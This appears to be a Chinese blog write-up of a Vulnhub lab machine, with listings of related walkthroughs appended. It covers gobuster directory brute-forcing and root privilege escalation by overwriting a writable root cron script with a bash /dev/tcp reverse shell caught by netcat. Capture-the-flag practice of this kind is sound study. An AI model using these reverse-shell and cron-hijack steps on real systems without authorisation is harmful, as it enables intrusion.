vunhub 靶機之旅 2

2021-09-02 22:12:27 字數 1388 閱讀 1397

youtube:

jarbas walkthrough | vulnhub

gobuster 子網域名稱/目錄暴力工具

-p string:基本auth的密碼(僅為dir模式)

-u string:基本auth的使用者名稱(僅為dir模式)

-a string:設定使用者**字串(dir模式)

-c string:用於請求的cookie(僅為dir模式)

-cn:顯示cnnex記錄(dns模式),不能與「-i」選項一起使用)

-e:擴充套件模式,列印完整url

-f:向每個目錄請求追加前斜線(僅為dir模式)

-fw:當萬用字元發現時,強制繼續操作

-i:顯示ip位址(僅dns模式)

-k:跳過ssl證書驗證

-l:包括在輸出中的主體長度(僅為dir模式)

-m string:目錄/檔案模式(dir)或dns模式(dns)(預設「dir」)

-n:不要列印狀態** -np:不顯示進度

-o string:輸出檔案以寫入結果(預設為stdut)

-p string:用於請求的**[http(s): //主機:埠](僅dir模式)

-q:不要列印橫幅和其他噪音

-r:追隨重定向

-s string:設定狀態碼(dir模式)(預設"200,204,301,302,307,403")

-t int:併發執行緒數(預設值10)

-to duration:http超時(僅限於dir模式)(預設10s)

-u string:目標url或域

-v:冗長輸出(錯誤)

-w string:暴力猜解的單詞列表的路徑

-x string:要搜尋的檔案擴充套件(僅限於dir模式)

goburst -u ip -w -x html,php,asp -t 10

dirbuster 暴力破解web目錄

msfconsole 找到乙個 script_console 進去

有wget

沒有gcc,yum必須管理員才能用,這條路斷掉

有定時任務

find -user root -writable -type f -not -path 「/proc/*」 2>/dev/null

找到以root許可權設的crontab定時任務的指令碼

reverse shell cheat sheet website:

download 改為 bash -i >& /dev/tcp/192.168.247.131(本機)/5555 0>&1 並upload

export term=screen

本機執行: nc -lvnp 192.168.247.131 5555

斷開 重連 連上了root

收穫:目錄工具的爆破,基於定時任務的linux提權

kali滲透綜合靶機 五 zico2靶機

kali滲透綜合靶機 五 zico2靶機 一 主機發現 二 埠掃瞄 三 埠服務識別 四 漏洞發現 1.訪問發現可能存在檔案包含漏洞 2.測試是否存在檔案包含漏洞,下圖說明存在存在檔案包含漏洞 3.掃瞄 目錄 4.測試資料庫是否可寫內容,在資料庫插入 phpinfo 然後結合檔案包含 然後結合檔案包含...

Bulldog 2靶機滲透

文章首發圈子社群 前兩天做了乙個靶機滲透題目,在此記錄一下 但如果靶機沒有顯示ip,可以用nmap掃瞄網段得到ip。的功能很簡單,註冊 登入以及瀏覽一些使用者資訊。簡單點了點 的功能,發現有登入和註冊,但是當我點選註冊的時候,介面顯示不讓註冊。有乙個user介面,裡面列出了9名使用者,有使用者名稱。...

靶機實戰2 bron2root

安裝的話,我使用了virtualbox,vmware對於一些靶機不相容,開啟不了 netdiscover掃瞄到靶機的ip 瀏覽器進入查詢一些資訊 三個使用者 hadijimmymartin 進行nmap掃瞄埠 這裡掃瞄到22 80 111 分別進入看看有沒有什麼資訊,但是無果 使用dirb查詢目錄檔...